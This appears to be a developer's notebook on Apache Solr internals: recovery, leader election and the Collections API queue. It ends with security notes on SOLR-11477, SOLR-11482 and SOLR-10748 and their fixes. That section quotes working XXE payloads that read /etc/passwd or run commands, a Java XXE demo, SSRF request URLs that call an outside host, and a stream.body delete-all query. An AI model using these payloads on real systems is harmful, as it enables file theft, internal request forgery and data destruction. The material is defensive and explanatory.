https://blog.csdn.net/u011426341/article/details/78940170
public String register(String coreName, final CoreDescriptor desc, boolean recoverReloadedCores, boolean afterExpiration) throws Exception {
  try (SolrCore core = cc.getCore(desc.getName())) {
    MDCLoggingContext.setCore(core);
  }
  try {
    ......
    ......
    try {
      // If we're a preferred leader, insert ourselves at the head of the queue
      boolean joinAtHead = false;
      Replica replica = zkStateReader.getClusterState().getReplica(desc.getCloudDescriptor().getCollectionName(),
          coreZkNodeName);
      if (replica != null) {
        joinAtHead = replica.getBool(SliceMutator.PREFERRED_LEADER_PROP, false);
      }
      joinElection(desc, afterExpiration, joinAtHead); // join leader election first
    } catch (InterruptedException e) {
      Thread.currentThread().interrupt();
      throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e);
    } catch (KeeperException | IOException e) {
      throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e);
    }
    String leaderUrl = getLeader(cloudDesc, leaderVoteWait + 600000);
    String ourUrl = ZkCoreNodeProps.getCoreUrl(baseUrl, coreName);
    log.info("We are " + ourUrl + " and leader is " + leaderUrl);
    boolean isLeader = leaderUrl.equals(ourUrl);
    try (SolrCore core = cc.getCore(desc.getName())) {
      UpdateLog ulog = core.getUpdateHandler().getUpdateLog();
      if (!afterExpiration && !core.isReloaded() && ulog != null) {
        Slice slice = getClusterState().getSlice(collection, shardId);
        if (slice.getState() != Slice.State.CONSTRUCTION || !isLeader) {
          // This is the replay call: the node may have had uncommitted data before the
          // restart, so check whether the tlog has an end marker; if not, replay it once.
          Future<UpdateLog.RecoveryInfo> recoveryFuture = core.getUpdateHandler().getUpdateLog().recoverFromLog();
          if (recoveryFuture != null) {
            log.info("Replaying tlog for " + ourUrl + " during startup... NOTE: This can take a while.");
            recoveryFuture.get(); // NOTE: this could potentially block for a long time
          } else {
            log.info("No LogReplay needed for core=" + core.getName() + " baseURL=" + baseUrl);
          }
        }
      }
      // Standard recovery flow: first decide whether peerSync is sufficient; if more
      // than 100 docs need to be recovered, go straight to replicate and copy index files.
      boolean didRecovery = checkRecovery(coreName, desc, recoverReloadedCores, isLeader, cloudDesc, collection,
          coreZkNodeName, shardId, leaderProps, core, cc, afterExpiration);
      if (!didRecovery) {
        publish(desc, Replica.State.ACTIVE); // no recovery needed: mark the core ACTIVE, startup succeeded
      }
      core.getCoreDescriptor().getCloudDescriptor().setHasRegistered(true);
    }
    // make sure we have an update cluster state right away
    zkStateReader.forceUpdateCollection(collection);
    return shardId;
  } finally {
    MDCLoggingContext.clear();
  }
}
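To make the checkRecovery() decision above concrete, here is a hedged sketch of just the strategy choice (names are illustrative stand-ins, not Solr's actual API; the 100-doc figure is PeerSync's recent-updates window):

// Illustrative only: which recovery path a replica ends up on.
String chooseRecoveryStrategy(long numMissedUpdates) {
  if (numMissedUpdates == 0) {
    return "none";      // already in sync: publish ACTIVE directly
  } else if (numMissedUpdates <= 100) {
    return "peerSync";  // fetch the few missed updates from the leader's tlog
  } else {
    return "replicate"; // too far behind: copy index files from the leader
  }
}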
There are three main recovery flows: replay, peersync, and replicate. Below we analyze all three recovery scenarios from the source code, in the context of concrete situations.
ZkController.register()
This is the key flow: the node first joins leader election, and then the recovery flow starts; that one recovery flow in fact covers all three scenarios mentioned above.
recoverFromLog
This mainly calls LogReplayer to replay the data.
LogReplayer
Replays the data in the tlog, which may include pending deletes as well.
public void doReplay(TransactionLog translog) { ... }
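A minimal, self-contained sketch of what the replay conceptually does (types and names here are hypothetical; the real logic lives in UpdateLog.LogReplayer, which re-applies each entry through the update processor chain):

import java.util.List;

class TlogReplaySketch {
  enum Op { ADD, DELETE, DELETE_BY_QUERY, COMMIT }

  static class Entry {
    final Op op;
    final String payload;
    Entry(Op op, String payload) { this.op = op; this.payload = payload; }
  }

  void replay(List<Entry> tlog) {
    for (Entry e : tlog) {
      switch (e.op) {
        case ADD:             System.out.println("re-index doc: " + e.payload); break;
        case DELETE:          System.out.println("delete by id: " + e.payload); break; // deletes are replayed too
        case DELETE_BY_QUERY: System.out.println("delete by query: " + e.payload); break;
        case COMMIT:          System.out.println("commit (end-of-log marker)"); break;
      }
    }
  }
}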
https://blog.csdn.net/u011426341/article/details/78939812
The election works like this: each Overseer candidate registers once in ZooKeeper and gets a sequence number; whichever holds the smallest sequence number is the leader. When that node dies, another round of election is held.
OverseerElectionContext.runLeaderProcess then starts the Overseer thread, which listens for requests on the distributed workQueue.
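A hedged, self-contained sketch of the underlying ZooKeeper pattern (ephemeral sequential nodes, lowest sequence number wins); this is the idea behind Solr's LeaderElector, not its actual code, and the election path is illustrative:

import java.util.Collections;
import java.util.List;
import org.apache.zookeeper.CreateMode;
import org.apache.zookeeper.KeeperException;
import org.apache.zookeeper.ZooDefs;
import org.apache.zookeeper.ZooKeeper;

class ElectionSketch {
  static boolean joinAndCheckLeader(ZooKeeper zk, String electionPath)
      throws KeeperException, InterruptedException {
    // Register once: ZooKeeper appends a monotonically increasing sequence number.
    String myNode = zk.create(electionPath + "/n_", new byte[0],
        ZooDefs.Ids.OPEN_ACL_UNSAFE, CreateMode.EPHEMERAL_SEQUENTIAL);
    List<String> children = zk.getChildren(electionPath, false);
    Collections.sort(children); // zero-padded sequence suffix sorts lexicographically
    // Leader iff we hold the smallest sequence number; when the leader's ephemeral
    // node vanishes (session death), the next node in order takes over.
    return myNode.endsWith(children.get(0));
  }
}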
Dispatching the core API
Take the CREATE request as an example: the logic sends an HTTP request to every node; this request is core-level, and each receiving node creates its corresponding core.
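A hedged sketch of that fan-out (Solr actually routes this through ShardHandler; the raw core-admin URL below just shows the shape of the per-node request):

import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.List;

class CoreCreateFanoutSketch {
  // Send a core-level CREATE to every node. Parameters are illustrative; the real
  // code derives them from the collection/shard/replica assignment.
  static void createCores(List<String> nodeBaseUrls, String coreName) throws IOException {
    for (String base : nodeBaseUrls) {
      URL url = new URL(base + "/admin/cores?action=CREATE&name=" + coreName);
      HttpURLConnection conn = (HttpURLConnection) url.openConnection();
      System.out.println(base + " -> HTTP " + conn.getResponseCode());
      conn.disconnect();
    }
  }
}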
Submitting the Collection API
The flow described above assumed the API request had already been written into the distributed queue for the Overseer to process. So how does a request get written into that queue in the first place? Again, take the CREATE request as an example.
The create request is received by CollectionsHandler; as usual, the entry method is again called handleRequestBody.
handleResponse
Here you can see that the create request is added to a distributed queue; the Overseer in the background then takes the request off the queue and dispatches it.
private SolrResponse handleResponse(String operation, ZkNodeProps m,
    SolrQueryResponse rsp, long timeout) throws KeeperException, InterruptedException {
  long time = System.nanoTime();
  if (m.containsKey(ASYNC) && m.get(ASYNC) != null) {
    String asyncId = m.getStr(ASYNC);
    if (asyncId.equals("-1")) {
      throw new SolrException(ErrorCode.BAD_REQUEST, "requestid can not be -1. It is reserved for cleanup purposes.");
    }
    NamedList<String> r = new NamedList<>();
    if (coreContainer.getZkController().getOverseerCompletedMap().contains(asyncId) ||
        coreContainer.getZkController().getOverseerFailureMap().contains(asyncId) ||
        coreContainer.getZkController().getOverseerRunningMap().contains(asyncId) ||
        overseerCollectionQueueContains(asyncId)) {
      r.add("error", "Task with the same requestid already exists.");
    } else {
      coreContainer.getZkController().getOverseerCollectionQueue()
          .offer(Utils.toJSON(m));
    }
    r.add(CoreAdminParams.REQUESTID, (String) m.get(ASYNC));
    SolrResponse response = new OverseerSolrResponse(r);
    rsp.getValues().addAll(response.getResponse());
    return response;
  }
  QueueEvent event = coreContainer.getZkController()
      .getOverseerCollectionQueue()
      .offer(Utils.toJSON(m), timeout); // this is the spot: offer() adds the request to the queue
  if (event.getBytes() != null) {
    SolrResponse response = SolrResponse.deserialize(event.getBytes()); // block waiting for the result, bounded by the timeout
    rsp.getValues().addAll(response.getResponse());
    SimpleOrderedMap exp = (SimpleOrderedMap) response.getResponse().get("exception");
    if (exp != null) {
      Integer code = (Integer) exp.get("rspCode");
      rsp.setException(new SolrException(code != null && code != -1 ? ErrorCode.getErrorCode(code) : ErrorCode.SERVER_ERROR, (String) exp.get("msg")));
    }
    return response;
  } else {
    if (System.nanoTime() - time >= TimeUnit.NANOSECONDS.convert(timeout, TimeUnit.MILLISECONDS)) {
      throw new SolrException(ErrorCode.SERVER_ERROR, operation
          + " the collection time out:" + timeout / 1000 + "s");
    } else if (event.getWatchedEvent() != null) {
      throw new SolrException(ErrorCode.SERVER_ERROR, operation
          + " the collection error [Watcher fired on path: "
          + event.getWatchedEvent().getPath() + " state: "
          + event.getWatchedEvent().getState() + " type "
          + event.getWatchedEvent().getType() + "]");
    } else {
      throw new SolrException(ErrorCode.SERVER_ERROR, operation
          + " the collection unknown case");
    }
  }
}
Testing
https://github.com/randomizedtesting/randomizedtesting/wiki/Core-Concepts
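A minimal example of the library's core concept (every random value derives from a master seed, so a failing run can be replayed exactly with -Dtests.seed=<seed>); a sketch assuming the library's JUnit runner:

import static org.junit.Assert.assertTrue;

import com.carrotsearch.randomizedtesting.RandomizedRunner;
import com.carrotsearch.randomizedtesting.RandomizedTest;
import org.junit.Test;
import org.junit.runner.RunWith;

@RunWith(RandomizedRunner.class)
public class RandomizedExampleTest extends RandomizedTest {
  @Test
  public void testWithRandomData() {
    int size = randomIntBetween(1, 100); // seed-derived, reproducible
    assertTrue(size >= 1 && size <= 100);
  }
}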
org.apache.solr.update.processor.DistributedUpdateProcessor.doDefensiveChecks(DistribPhase)
CloudDescriptor cloudDescriptor = req.getCore().getCoreDescriptor().getCloudDescriptor();
Slice mySlice = clusterState.getSlice(collection, cloudDescriptor.getShardId());
boolean localIsLeader = cloudDescriptor.isLeader();
ZkController zoo = req.getCore().getCoreDescriptor().getCoreContainer().getZkController();
Set<String> nodes = zoo.getClusterState().getLiveNodes();
core.addCloseHook(new CloseHook() {})
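Filled out, the hook might look like this (a sketch; CloseHook's preClose/postClose run just before and after the core shuts down):

core.addCloseHook(new CloseHook() {
  @Override
  public void preClose(SolrCore core) {
    // runs before the core's resources are torn down, e.g. stop background watchers
  }
  @Override
  public void postClose(SolrCore core) {
    // runs after the core is closed, e.g. release external resources
  }
});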
final ZkStateReader zkStateReader = core.getCoreDescriptor().getCoreContainer().getZkController().getZkStateReader();
org.apache.solr.handler.admin.CollectionsHandler
handleRequestBody(SolrQueryRequest, SolrQueryResponse)
Map<String, Object> result = operation.call(req, rsp, this);
enum CollectionOperation
SolrTestCaseJ4
private static MiniSolrCloudCluster solrCluster;
solrCluster = new MiniSolrCloudCluster(4, createTempDir().toFile(), solrXml, buildJettyConfig("/solr"));
solrCluster.uploadConfigDir(configDir, "conf");
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
Use System.nanoTime() (monotonic) rather than System.currentTimeMillis() when computing timeouts:
public Replica getLeaderRetry(String collection, String shard, int timeout) throws InterruptedException {
  long timeoutAt = System.nanoTime() + TimeUnit.NANOSECONDS.convert(timeout, TimeUnit.MILLISECONDS);
  while (true) {
    Replica leader = getLeader(collection, shard);
    if (leader != null) return leader;
    if (System.nanoTime() >= timeoutAt || closed) break;
    Thread.sleep(GET_LEADER_RETRY_INTERVAL_MS);
  }
  throw new SolrException(ErrorCode.SERVICE_UNAVAILABLE, "No registered leader was found after waiting for "
      + timeout + "ms " + ", collection: " + collection + " slice: " + shard);
}
Replica leaderReplica = zkController.getZkStateReader().getLeaderRetry(collection, shardId);
isLeader = leaderReplica.getName().equals(
    req.getCore().getCoreDescriptor().getCloudDescriptor().getCoreNodeName());
// Detect whether a new commit happened by comparing index commit generations.
long newCommitGeneration = SegmentInfos.getLastCommitGeneration(directory);
boolean commitHappened = newCommitGeneration != lastCommitGeneration;
lastCommitGeneration = newCommitGeneration;
return commitHappened;
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
There are a few different types of entities, external general/parameter parsed entity often shortened to external entity, that can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be dereferenced (accessed) by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply to the usage of external DTDs, external stylesheets, external schemas, etc. which, when included, allow similar external resource inclusion style attacks.
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" >]> <creds> <user>&xxe;</user> <pass>mypass</pass> </creds>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
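The danger is easy to demonstrate: a DocumentBuilderFactory left at its defaults will happily dereference the SYSTEM identifier above. A self-contained sketch (parses the file:// payload and prints the exfiltrated file):

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class XxeDemo {
  public static void main(String[] args) throws Exception {
    String payload = "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
        + "<foo>&xxe;</foo>";
    // Default-configured parser: external general entities are resolved.
    Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
        .parse(new ByteArrayInputStream(payload.getBytes(StandardCharsets.UTF_8)));
    System.out.println(doc.getDocumentElement().getTextContent()); // contents of /etc/passwd
  }
}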
* SOLR-11477: Disallow resolving of external entities in queryparser/xml/CoreParser by default.
https://issues.apache.org/jira/browse/SOLR-11477
https://issues.apache.org/jira/secure/attachment/12892047/SOLR-11477.patch
Lucene includes a query parser that is able to create the full spectrum of Lucene queries, using an XML data structure. Starting from version 5.1, Solr supports the "xml" query parser in search queries.
The problem is that the Lucene XML parser does not explicitly prohibit doctype declarations and expansion of external entities. It is possible to include special entities in the XML document that point to external files (via file://) or external URLs (via http://):
Example usage:
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"><a></a>'}
When Solr parses this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as the DOCTYPE definition.
Considering that we can define the parser type in the search query, which very often comes from untrusted user input (e.g. search fields on websites), this allows an external attacker to make arbitrary HTTP requests to the local Solr instance and to bypass all firewall restrictions.
For example, this vulnerability could be used to send malicious data to the '/upload' handler:
http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}
This vulnerability can also be exploited as Blind XXE using the ftp wrapper in order to read arbitrary local files from the Solr server.
The XmlQParserPlugin extends the QParserPlugin and supports the creation of queries from XML.
The XmlQParser implementation uses the SolrCoreParser class, which extends Lucene's CoreParser class. XML elements are mapped to QueryBuilder classes (see the reference guide for the full element-to-builder table).
You can configure your own custom query builders for additional XML elements. The custom builders need to extend the SolrQueryBuilder or the SolrSpanQueryBuilder class. Example solrconfig.xml snippet:
<queryParser name="xmlparser" class="XmlQParserPlugin">
<str name="MyCustomQuery">com.mycompany.solr.search.MyCustomQueryBuilder</str>
</queryParser>
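A hedged sketch of such a custom builder (the SolrQueryBuilder constructor signature below is my reading of the base class and may differ across Solr versions; verify against your release):

package com.mycompany.solr.search;

import org.apache.lucene.analysis.Analyzer;
import org.apache.lucene.index.Term;
import org.apache.lucene.queryparser.xml.ParserException;
import org.apache.lucene.queryparser.xml.QueryBuilder;
import org.apache.lucene.search.Query;
import org.apache.lucene.search.TermQuery;
import org.apache.solr.request.SolrQueryRequest;
import org.apache.solr.search.SolrQueryBuilder;
import org.w3c.dom.Element;

public class MyCustomQueryBuilder extends SolrQueryBuilder {
  public MyCustomQueryBuilder(String defaultField, Analyzer analyzer,
      SolrQueryRequest req, QueryBuilder queryFactory) {
    super(defaultField, analyzer, req, queryFactory);
  }

  @Override
  public Query getQuery(Element e) throws ParserException {
    // Build a Lucene query from the <MyCustomQuery> element's attributes/text.
    return new TermQuery(new Term(e.getAttribute("fieldName"), e.getTextContent()));
  }
}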
public static final EntityResolver DISALLOW_EXTERNAL_ENTITY_RESOLVER = (String publicId, String systemId) -> {
  throw new SAXException(String.format(Locale.ENGLISH,
      "External Entity resolving unsupported: publicId=\"%s\" systemId=\"%s\"",
      publicId, systemId));
};

private Document parseXML(InputStream pXmlFile) throws ParserException {
  final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
  dbf.setValidating(false);
  try {
    dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
  } catch (ParserConfigurationException e) {
    // ignore since all implementations are required to support the
    // {@link javax.xml.XMLConstants#FEATURE_SECURE_PROCESSING} feature
  }
  final DocumentBuilder db;
  try {
    db = dbf.newDocumentBuilder();
  } catch (Exception se) {
    throw new ParserException("XML Parser configuration error.", se);
  }
  try {
    db.setEntityResolver(getEntityResolver());
    db.setErrorHandler(getErrorHandler());
    return db.parse(pXmlFile);
  } catch (Exception se) {
    throw new ParserException("Error parsing XML stream: " + se, se);
  }
}
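Per the SOLR-11477 patch, getEntityResolver() returns DISALLOW_EXTERNAL_ENTITY_RESOLVER by default, so the parseXML() above fails fast on any external entity unless a subclass deliberately overrides the resolver.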
https://issues.apache.org/jira/browse/SOLR-11482
RunExecutableListener hands its configured command straight to the JVM:
proc = Runtime.getRuntime().exec(cmd, envp, dir);
The patch gates this behind an explicit opt-in ('-Dsolr.enableRunExecutableListener=true') and otherwise rejects the listener at init time:
throw new SolrException(ErrorCode.UNAUTHORIZED, WARNING_MESSAGE);
* SOLR-11482: RunExecutableListener was deprecated and is disabled by default for security reasons. Legacy applications still using it must explicitly pass '-Dsolr.enableRunExecutableListener=true' to the Solr command line. Be aware that you should really disable API-based config editing at the same time, using '-Ddisable.configEdit=true'!
https://issues.apache.org/jira/browse/SOLR-10748
Today you can issue an HTTP request parameter stream.body which Solr will interpret as body content on the request, i.e. act as a POST request. This is useful for development and testing but can pose a security risk in production, since users/clients with permission to GET on various endpoints can also post by using stream.body. The classic example is &stream.body=<delete><query>*:*</query></delete>. And this feature cannot be turned off by configuration; it is not controlled by enableRemoteStreaming.
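As an illustration of that risk, a GET of the following shape deletes everything (collection name is a placeholder):
http://localhost:8983/solr/gettingstarted/update?stream.body=<delete><query>*:*</query></delete>&commit=true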
This jira will add a configuration option requestDispatcher.requestParsers.enableStreamBody to the <requestParsers> tag in solrconfig as well as to the Config API. I propose to set the default value to *false*.
Apart from security concerns, this also aligns well with our v2 API effort, which tries to stick to the principle of least surprise in that GET requests shall not be able to modify state. Developers should know how to do a POST today.
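With the option in place, the hardened solrconfig.xml looks roughly like this (attribute names per SOLR-10748; the upload limit is just an example value):

<requestDispatcher>
  <requestParsers enableRemoteStreaming="false"
                  enableStreamBody="false"
                  multipartUploadLimitInKB="2048" />
</requestDispatcher>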
https://issues.apache.org/jira/browse/SOLR-9623
https://lucene.apache.org/solr/guide/6_6/content-streams.html#ContentStreams-RemoteStreaming
https://stackoverflow.com/questions/16857923/remote-streaming-with-solr
If enableRemoteStreaming="true" is used, be aware that this allows anyone to send a request to any URL or local file. If DumpRequestHandler is enabled, it will allow anyone to view any file on your system.
http://www.apache.org/dyn/closer.lua/lucene/solr/6.6.2
http://mail-archives.apache.org/mod_mbox/lucene-dev/201710.mbox/%3CCAJEmKoC%2BeQdP-E6BKBVDaR_43fRs1A-hOLO3JYuemmUcr1R%2BTA%40mail.gmail.com%3E
> In all three requests Solr responds with different errors, but all of
> these errors happened after the desired actions were executed.
>
> All these vulnerabilities were tested on the latest version of Apache Solr
> with the default cloud config (bin/solr start -e cloud -noprompt)
Common Vulnerabilities and Exposures (CVE):
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-18263/Apache-Solr.html
https://en.wikipedia.org/wiki/Zero-day_(computing)